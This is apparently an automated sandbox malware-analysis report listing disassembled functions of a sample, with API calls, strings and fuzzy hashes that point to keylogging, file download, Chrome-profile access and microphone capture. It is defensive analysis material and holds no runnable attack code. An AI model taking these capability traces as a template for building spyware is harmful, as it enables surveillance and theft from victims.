                                • Instruction Fuzzy Hash: 59C04C15080781541C50B6B2210B2AE83461E7E38DFD074DFFCE0571038E4E043B653F
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00442C5D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON
                                Download Yara Rule
                                APIs
                                • __startOneArgErrorHandling.LIBCMT ref: 00442CED
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorHandling__start
                                • String ID: pow
                                • API String ID: 3213639722-2276729525
                                • Opcode ID: ae0341c24035669086af68b363e9d44c4063f2ceb2f02d621ae22780893f867c
                                • Instruction ID: c2a334fe3ab53b67a82bc2a1da04863f7f1ed5e2a579c87dfbcc8ae8a095d349
                                • Opcode Fuzzy Hash: ae0341c24035669086af68b363e9d44c4063f2ceb2f02d621ae22780893f867c
                                • Instruction Fuzzy Hash: C6516DA1E0420296FB167B14CE4137B2BA4DB40751F704D7FF096823AAEB7D8C859A4F
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0044561B Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 147COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: __alloca_probe_16__freea
                                • String ID: (x
                                • API String ID: 1635606685-2016957024
                                • Opcode ID: d3b8ec8c6fe5f6eb2882eacf74388bd8eed826f0c70f22c7b35089f58873391c
                                • Instruction ID: 8ea394e19242d531593115f3ad9b67f2d9726ff50e2d779c509e1c2fd2e4051b
                                • Opcode Fuzzy Hash: d3b8ec8c6fe5f6eb2882eacf74388bd8eed826f0c70f22c7b35089f58873391c
                                • Instruction Fuzzy Hash: F141D431A00511EBFF219B65CC42A5F77A4EF55720F65452BF808DB252EB3CD841C66D
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00449E3C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 116COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • WideCharToMultiByte.KERNEL32(000000FF,00000000,00000006,00000001,?,?,00000000,?,00000000,?,?,00000000,00000006,?,?,?), ref: 00449F0F
                                • GetLastError.KERNEL32 ref: 00449F2B
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: ByteCharErrorLastMultiWide
                                • String ID: PkGNG
                                • API String ID: 203985260-263838557
                                • Opcode ID: 8762d6c9eb8cd6bb849928aa97b0b7335ecf1b8cbe6ccd937ce160abea437523
                                • Instruction ID: 5218313022fb824330162c1b3e1e252a07855a0508c927524b2412b0d5c8e50b
                                • Opcode Fuzzy Hash: 8762d6c9eb8cd6bb849928aa97b0b7335ecf1b8cbe6ccd937ce160abea437523
                                • Instruction Fuzzy Hash: A531F831600205EBEB21EF56C845BAB77A8DF55711F24416BF9048B3D1DB38CD41E7A9
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00418A92 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 92COMMON
                                Download Yara Rule
                                APIs
                                • SHCreateMemStream.SHLWAPI(00000000,00000000,?,?,?,00000000), ref: 00418ABE
                                  • Part of subcall function 00418656: GdipLoadImageFromStream.GDIPLUS(?,?,?,00418AD1,00000000,?,?,?,?,00000000), ref: 0041866A
                                • SHCreateMemStream.SHLWAPI(00000000), ref: 00418B0B
                                  • Part of subcall function 004186CB: GdipSaveImageToStream.GDIPLUS(?,?,?,?,00000000,00418B27,00000000,?,?), ref: 004186DD
                                  • Part of subcall function 00418679: GdipDisposeImage.GDIPLUS(?,00418B82), ref: 00418682
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: Stream$GdipImage$Create$DisposeFromLoadSave
                                • String ID: image/jpeg
                                • API String ID: 1291196975-3785015651
                                • Opcode ID: 8883413a241ecd6daa78ef1183ec8e175d09e4f7b2134cb7e7ff04ec22b53db4
                                • Instruction ID: 71c7567624fb1f0fb67e5b365d5baafb3eed0516d04e2b9615b8e3d4f66a2876
                                • Opcode Fuzzy Hash: 8883413a241ecd6daa78ef1183ec8e175d09e4f7b2134cb7e7ff04ec22b53db4
                                • Instruction Fuzzy Hash: 13317F71504300AFC301EF65CC84DAFB7E9FF8A704F00496EF985A7251DB7999448BA6
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00451B37 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,00451D92,?,00000050,?,?,?,?,?), ref: 00451C12
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: ACP$OCP
                                • API String ID: 0-711371036
                                • Opcode ID: 9e0df5bdb224d2be14a0cd5949da06f0ee57b11af7c7271d7bdd2cdd18eeb32c
                                • Instruction ID: fc24b39bc158c677debbea649066bee6e1bba6d32f28379ebc1c8ba741b2d3ba
                                • Opcode Fuzzy Hash: 9e0df5bdb224d2be14a0cd5949da06f0ee57b11af7c7271d7bdd2cdd18eeb32c
                                • Instruction Fuzzy Hash: BA217D22A4010063DB34CF54C940B9B326ADF50B27F568166ED09C7322F73AED44C39C
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0044B731 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 81fileCOMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • WriteFile.KERNEL32(?,?,?,?,00000000,FF8BC35D,00000000,?,PkGNG,0044BB6E,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 0044B7DB
                                • GetLastError.KERNEL32 ref: 0044B804
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorFileLastWrite
                                • String ID: PkGNG
                                • API String ID: 442123175-263838557
                                • Opcode ID: e2af8d231f6539d56f2593d6ace3ed0d4bab48f660b2d85d051dab4aa689f9d2
                                • Instruction ID: 56933c973e2243a1a9a6e47b5ff38ff3048756f5123006952a384074424e161b
                                • Opcode Fuzzy Hash: e2af8d231f6539d56f2593d6ace3ed0d4bab48f660b2d85d051dab4aa689f9d2
                                • Instruction Fuzzy Hash: 12319331A00619DBCB24CF59CD809DAB3F9EF88311F1445AAE509D7361D734ED81CB68
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0044B652 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77fileCOMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • WriteFile.KERNEL32(?,?,?,?,00000000,FF8BC35D,00000000,?,PkGNG,0044BB8E,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 0044B6ED
                                • GetLastError.KERNEL32 ref: 0044B716
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorFileLastWrite
                                • String ID: PkGNG
                                • API String ID: 442123175-263838557
                                • Opcode ID: 51546446b41bf805027a94335c0e64e4fe702750584376849c5da3291fd64da6
                                • Instruction ID: 12ef57d8ab414bd2a6c5914f5c8b73f84ca543b1ee1fc2f1adbb6bb6aefc8993
                                • Opcode Fuzzy Hash: 51546446b41bf805027a94335c0e64e4fe702750584376849c5da3291fd64da6
                                • Instruction Fuzzy Hash: 6C21B435600219DFCB14CF69C980BE9B3F8EB48302F1044AAE94AD7351D734ED81CB64
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00418B8F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 75COMMON
                                Download Yara Rule
                                APIs
                                • SHCreateMemStream.SHLWAPI(00000000,00000000,?,?,?,00000000), ref: 00418BAA
                                  • Part of subcall function 00418656: GdipLoadImageFromStream.GDIPLUS(?,?,?,00418AD1,00000000,?,?,?,?,00000000), ref: 0041866A
                                • SHCreateMemStream.SHLWAPI(00000000,00000000,00000000,?,?,?,?,00000000), ref: 00418BCF
                                  • Part of subcall function 004186CB: GdipSaveImageToStream.GDIPLUS(?,?,?,?,00000000,00418B27,00000000,?,?), ref: 004186DD
                                  • Part of subcall function 00418679: GdipDisposeImage.GDIPLUS(?,00418B82), ref: 00418682
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: Stream$GdipImage$Create$DisposeFromLoadSave
                                • String ID: image/png
                                • API String ID: 1291196975-2966254431
                                • Opcode ID: 6411a8012ecf1a64a1773f4eaa23e3f4fcdf1f742ac8238d8550c3e8c78666f9
                                • Instruction ID: c6f894421d6f6d4ca6915e56eba1d7ff3797fde04a376feef2065c2e579c4a83
                                • Opcode Fuzzy Hash: 6411a8012ecf1a64a1773f4eaa23e3f4fcdf1f742ac8238d8550c3e8c78666f9
                                • Instruction Fuzzy Hash: 30219371204211AFC705EB61CC88CBFBBADEFCA754F10092EF54693161DB399945CBA6
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00404FF4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67timeCOMMON
                                Download Yara Rule
                                APIs
                                • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415CC9,?,00000001,0000004C,00000000), ref: 00405030
                                  • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415CC9,?,00000001,0000004C,00000000), ref: 00405087
                                Strings
                                • KeepAlive | Enabled | Timeout: , xrefs: 0040501F
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: LocalTime
                                • String ID: KeepAlive | Enabled | Timeout:
                                • API String ID: 481472006-1507639952
                                • Opcode ID: 23b0d405c7df8ea3eb93e7c73b3042e9bf9b9ce6517dcb05167bfa0c68009315
                                • Instruction ID: 59903f388a44bacb81d563bcbf5ab321eb0051b597eccb46fab67989b44e7fd4
                                • Opcode Fuzzy Hash: 23b0d405c7df8ea3eb93e7c73b3042e9bf9b9ce6517dcb05167bfa0c68009315
                                • Instruction Fuzzy Hash: 1D21F2719046405BD710B7259C0676F7B64E751308F40087EE8491B2A6DA7D5A88CBEF
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0041663B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62sleepfilenetworkCOMMON
                                Download Yara Rule
                                APIs
                                • Sleep.KERNEL32 ref: 00416640
                                • URLDownloadToFileW.URLMON(00000000,00000000,00000002,00000000,00000000), ref: 004166A2
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: DownloadFileSleep
                                • String ID: !D@
                                • API String ID: 1931167962-604454484
                                • Opcode ID: 67dfb507ba3ddc82345b7865ce065edb943c59958e882518e560ee8acae80623
                                • Instruction ID: f21b004d79e7af0ef9ad63e4b6518ad07bb10e0138b316cec4f8e9f86784bb19
                                • Opcode Fuzzy Hash: 67dfb507ba3ddc82345b7865ce065edb943c59958e882518e560ee8acae80623
                                • Instruction Fuzzy Hash: C6115171A083029AC714FF72D8969BE77A8AF54348F400C3FF546621E2EE3C9949C65A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0041AD17 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                                Download Yara Rule
                                APIs
                                • PathFileExistsW.SHLWAPI(00000000), ref: 0041AD3C
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExistsFilePath
                                • String ID: alarm.wav$hYG
                                • API String ID: 1174141254-2782910960
                                • Opcode ID: 03e35b0c78ecaf780253322939ef9894f1bf68fcbaf7cdf3e29ba7f04c14b924
                                • Instruction ID: 1ebdaa4a32a078914063a8122a991a3a49773bb3edac1861de613ef54c78e1f6
                                • Opcode Fuzzy Hash: 03e35b0c78ecaf780253322939ef9894f1bf68fcbaf7cdf3e29ba7f04c14b924
                                • Instruction Fuzzy Hash: 7A01F5B064460156C604F37698167EE37464B80319F00447FF68A266E2EFBC9D99C68F
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040B051 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 0040B164: GetLocalTime.KERNEL32(?,Offline Keylogger Started,004750F0), ref: 0040B172
                                  • Part of subcall function 0040B164: wsprintfW.USER32 ref: 0040B1F3
                                  • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                • CloseHandle.KERNEL32(?), ref: 0040B0B4
                                • UnhookWindowsHookEx.USER32 ref: 0040B0C7
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                                • String ID: Online Keylogger Stopped
                                • API String ID: 1623830855-1496645233
                                • Opcode ID: bec78cf3eedf1b186c8e89cd18ae9734a19b2f7b120e1a552bb6b5e0ab87ed89
                                • Instruction ID: 2e372e3e3892c4e8816e9c8053feed756abc81e7e35a03d4dadb391bbfa0e77d
                                • Opcode Fuzzy Hash: bec78cf3eedf1b186c8e89cd18ae9734a19b2f7b120e1a552bb6b5e0ab87ed89
                                • Instruction Fuzzy Hash: 0101F5306002049BD7217B35C80B3BF7BA59B41305F40007FE642226D2EBB91845D7DE
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00448BB3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,73E85006,00000001,?,0043CE55), ref: 00448C24
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: String
                                • String ID: LCMapStringEx$PkGNG
                                • API String ID: 2568140703-1065776982
                                • Opcode ID: 6176356b550008225c45ed95f9c308570f022b01c1c57b82113652449518e224
                                • Instruction ID: 91dcaeff4e4508283399e99d6512adb219adb357de156da575c9a111b1dd59a7
                                • Opcode Fuzzy Hash: 6176356b550008225c45ed95f9c308570f022b01c1c57b82113652449518e224
                                • Instruction Fuzzy Hash: 3F016532500209FBCF029F90DC01EEE7F62EF08351F10452AFE0925161CA3A8971AB99
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 004017EC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON
                                Download Yara Rule
                                APIs
                                • waveInPrepareHeader.WINMM(0077F7B0,00000020,?,?,00476B50,00474EE0,?,00000000,00401A15), ref: 00401849
                                • waveInAddBuffer.WINMM(0077F7B0,00000020,?,00000000,00401A15), ref: 0040185F
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: wave$BufferHeaderPrepare
                                • String ID: hpw
                                • API String ID: 2315374483-1490804451
                                • Opcode ID: db4cc151110a5f9a71eb5ce2d7546914e9eb517e880c4322ad0588f055fadbe6
                                • Instruction ID: 6f1d19605e244f5f119b09d66236675289974365e05be472c2159163c6862827
                                • Opcode Fuzzy Hash: db4cc151110a5f9a71eb5ce2d7546914e9eb517e880c4322ad0588f055fadbe6
                                • Instruction Fuzzy Hash: D3016D71700301AFD7209F75EC48969BBA9FB89355701413AF409D3762EB759C90CBA8
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0044378C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 35COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free
                                • String ID: $G
                                • API String ID: 269201875-4251033865
                                • Opcode ID: 061f1d377262398e84625751e00800f7b3b9231d747b7f71bcbf8f837b64f860
                                • Instruction ID: ffc8389238c956ab6c1ca4f2b01b58cd1871601a5e35f3520dab429f03a8b914
                                • Opcode Fuzzy Hash: 061f1d377262398e84625751e00800f7b3b9231d747b7f71bcbf8f837b64f860
                                • Instruction Fuzzy Hash: 7DE0E592A0182014F6717A3F6C0575B0545CBC2B7FF11833BF538861C1CFAC4A46519E
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00448AE6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • IsValidLocale.KERNEL32(00000000,JD,00000000,00000001,?,?,00444AEA,?,?,004444CA,?,00000004), ref: 00448B32
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: LocaleValid
                                • String ID: IsValidLocaleName$JD
                                • API String ID: 1901932003-2234456777
                                • Opcode ID: 98bf4732c76f9d0cbfb8c103c3b900cf5be1bffc9926f7dc5154a94851103fac
                                • Instruction ID: c43517d2c5aad0833927174c53c021eab8a1ac695cd7bc198788f3b2bcf9e263
                                • Opcode Fuzzy Hash: 98bf4732c76f9d0cbfb8c103c3b900cf5be1bffc9926f7dc5154a94851103fac
                                • Instruction Fuzzy Hash: D6F05230A80308F7DB106B60DC06FAEBF58CB04B52F10017EFD046B291CE786E05929E
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040C4C3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                Download Yara Rule
                                APIs
                                • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000), ref: 0040C4F6
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
